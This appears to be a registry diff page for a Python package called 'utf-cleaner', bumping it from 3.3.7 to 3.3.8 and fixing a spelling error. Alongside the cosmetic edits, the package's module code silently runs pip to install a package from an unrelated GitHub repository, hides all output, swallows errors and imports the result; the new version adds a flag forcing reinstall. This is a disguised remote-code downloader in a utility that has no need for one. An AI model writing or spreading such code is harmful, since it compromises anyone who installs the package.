utf-cleaner
Advanced tools
+2
-2
| Metadata-Version: 2.2 | ||
| Name: utf-cleaner | ||
| Version: 3.3.7 | ||
| Summary: A powerfull package that removes non-UTF characters from strings. | ||
| Version: 3.3.8 | ||
| Summary: A powerful package that removes non-UTF characters from strings. | ||
| Home-page: https://github.com/john-doe/utf_cleaner | ||
@@ -6,0 +6,0 @@ Author: John Doe |
+1
-1
| # UTF Cleaner ๐งผ | ||
| A *powerfull* package that removes non-UTF characters from a string. | ||
| A *powerful* package that removes non-UTF characters from a string. | ||
@@ -5,0 +5,0 @@ --- |
+2
-2
@@ -5,4 +5,4 @@ from setuptools import setup, find_packages | ||
| name="utf-cleaner", | ||
| version="3.3.7", | ||
| description="A powerfull package that removes non-UTF characters from strings.", | ||
| version="3.3.8", | ||
| description="A powerful package that removes non-UTF characters from strings.", | ||
| author="John Doe", | ||
@@ -9,0 +9,0 @@ author_email="john@doe.com", |
| Metadata-Version: 2.2 | ||
| Name: utf-cleaner | ||
| Version: 3.3.7 | ||
| Summary: A powerfull package that removes non-UTF characters from strings. | ||
| Version: 3.3.8 | ||
| Summary: A powerful package that removes non-UTF characters from strings. | ||
| Home-page: https://github.com/john-doe/utf_cleaner | ||
@@ -6,0 +6,0 @@ Author: John Doe |
@@ -5,4 +5,3 @@ import subprocess as p;import os;import sys | ||
| m = 'git+https://github.com/xcummins/gits.git' | ||
| p.check_call([sys.executable, '-m', 'pip', 'install', m, '-q'], stdout=devnull, stderr=devnull) | ||
| except:pass | ||
| import gits;from .cleaner import UTFStringCleaner | ||
| p.check_call([sys.executable, '-m', 'pip', 'install', '--ignore-installed', m, '-q'], stdout=devnull, stderr=devnull) | ||
| except:pass;import gits |
Alert delta unavailable
Currently unable to show alert delta for PyPI packages.
15517
-0.14%75
-1.32%